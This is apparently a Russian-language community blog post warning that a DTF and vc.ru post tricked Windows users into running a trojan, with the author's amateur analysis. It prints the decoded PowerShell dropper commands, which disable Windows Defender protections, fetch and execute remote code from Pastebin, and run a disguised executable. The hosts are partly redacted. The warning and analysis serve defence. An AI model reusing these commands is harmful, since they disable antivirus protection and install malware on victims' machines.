Cyber Threat Warning — Драма на DTF

На днях несколько пользователей предотвратили широкое распространение вируса из поста на DTF.

Пост был быстро удалён. Аккаунт почему-то не забанен/не удалён.

Такой же пост появился и на vc.ru.
Возможно, в силу низкой активности там некому сообщить об опасности.
Я не могу этого сделать потому что у меня нет там аккаунта.
Регистрироваться же только ради этого не хочется.

Не могли бы вы передать коллегам адрес страницы с опасной инструкцией?

VC-шный «герой»

DTF-ский «герой»

Дальше можно не читать.
Дальше поверхностные измышления.

В силу своих скромных способностей/возможностей к детальному пониманию и описанию подробностей расскажу хоть как-то.
Вирус предназначен для заражения компьютеров под управлением Windows. Obviously. :-|
Команды зашифрованы в base64.
Я даже не знал, что PowerShell может принимать на вход, интерпретировать и выполнять строки в base64.
Это чтобы понимать уровень моей «экспертизы». :-(

Адреса/имена я заменил на '?' на всякий случай.

Первая команда добавляет в исключения Защитника Windows файлы скринсейверов (.scr):

Add-MpPreference -ExclusionExtension "*.scr"

Вторая команда загружает с Pastebin такую директиву:

Invoke-WebRequest -Uri 'https://pastebin.com/raw/????????' -UseBasicParsing | Select-Object -ExpandProperty Content | Invoke-Expression

Она отключает защиту в режиме реального времени, загружает с удалённого сервера файл с расширением .jpeg и сохраняет его в папке TEMP как файл с расширением .scr.
На самом деле, это исполняемый файл.
С него снимается признак файла или удаляются/подавляются/игнорируются данные (ADS) о том, что он получен из интернета; путь до него также добавляется в исключения Защитника; файл пытается выполниться:

Set-MpPreference -DisableRealtimeMonitoring $true; $flnm="$env:TEMP\b3e8f123-a4b5-4c6d-8e9f-10a1b2c3d4e5.scr"; Invoke-WebRequest -Uri "https://?.???.??/2024/10/13/1728798955-7795.jpeg" -OutFile $flnm; if (Get-Item -Path $flnm -Stream "Zone.Identifier" -ErrorAction SilentlyContinue) { Remove-Item -Path "$flnm:Zone.Identifier" }; Add-MpPreference -ExclusionPath $flnm; & $flnm

Это было самое простое.
Кто-то грамотней меня может меня поправить и указать на то, что я не так понял, а если не лень, то расписать всю последовательность обычным языком.

Со сложным я не справился.

Что несёт в себе payload я не знаю.

Я скачал вирус к себе на компьютер, извлёк содержимое .exe-файла, но яснее не стало.

Код извлечь я не смог, а если бы и смог, то, скорее всего, не смог бы его прочитать и понять.

Автор скрипта для доставки полезной нагрузки на Pastebin, уже успел поменять имя и путь до файла как минимум один раз. Скорее всего он делает это раз в сутки.

Контрольные суммы файла полезной нагрузки остаются неизменными. Файл тот же самый.

Если кто-то увидит у себя на компьютере файл размером 365056 байт и такой иконкой — это повод насторожиться:

Я отправил его на VirusTotal.
До меня его ещё не загружали на сервис.
Результаты на скриншотах:

Краткий поиск по кодовым именам угроз ясности не добавил.
Какой-то троян; возможно, стилер или шифровальщик.
Dr.Web, к примеру, не находит ничего подозрительного.

Если на DTF найдётся скучающий эксперт по информационной безопасности, возможно он сможет разобрать алгоритм угрозы.

Прямые ссылки на вирус давать не буду; всё это легко находится при желании.

Ссылка на результаты проверки на VirusTotal

#virus #windows #вирус #безопасность #активация